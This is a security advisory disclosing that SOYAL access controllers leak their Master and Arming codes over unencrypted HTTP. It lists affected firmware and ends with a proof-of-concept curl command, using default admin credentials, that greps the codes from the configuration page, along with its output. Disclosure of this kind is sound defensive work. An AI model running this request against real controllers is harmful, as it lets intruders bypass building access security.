SOYAL Biometric Access Control System 5.0 Master Code Disclosure  
Vendor: SOYAL Technology Co., Ltd  
Product web page: |  
Affected version: AR-727 i/CM - F/W: 5.0   
AR837E/EF - F/W: 4.3  
AR725Ev2 - F/W: 4.3 191231  
AR331/725E - F/W: 4.2  
AR837E/EF - F/W: 4.1  
AR-727CM /i - F/W: 4.09  
AR-727CM /i - F/W: 4.06  
AR-837E - F/W: 3.03  
Summary: Soyal Access systems are built into Raytel Door Entry Systems  
and are providing access and lift control to many buildings from public  
and private apartment blocks to prestigious public buildings.  
Desc: The controller suffers from a cleartext transmission of sensitive  
information. This allows interception of the HTTP traffic and disclose  
the Master code and the Arming code via a man-in-the-middle attack. An  
attacker can obtain these codes to enter into the controller's Programming  
mode and bypass physical security controls in place.  
Tested on: SOYAL Technology WebServer 2.0  
SOYAL Serial Device Server 4.03A   
SOYAL Serial Device Server 4.01n  
SOYAL Serial Device Server 3.07n  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2021-5630  
Advisory URL:  
$ curl '' \  
-H 'Authorization: Basic YWRtaW46' | \  
grep -ni -B1 'masterCode\|armCode'  
<td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td>  
<td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr>  
<td>Arming Code (4 Digital) </td>  
<td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>